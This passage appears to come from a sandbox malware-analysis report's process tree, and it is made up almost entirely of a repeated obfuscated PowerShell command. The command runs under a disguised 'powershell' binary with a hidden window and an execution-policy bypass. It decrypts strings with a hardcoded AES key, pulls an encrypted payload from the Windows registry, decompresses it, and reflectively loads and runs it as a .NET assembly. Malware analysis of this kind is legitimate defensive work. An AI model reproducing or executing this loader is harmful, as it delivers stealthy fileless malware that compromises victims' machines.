$BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        29⤵
        
        PID:3644
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        Hide Artifacts: Hidden Window
        
        PID:8240
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        30⤵
        
        PID:8536
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(3644).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
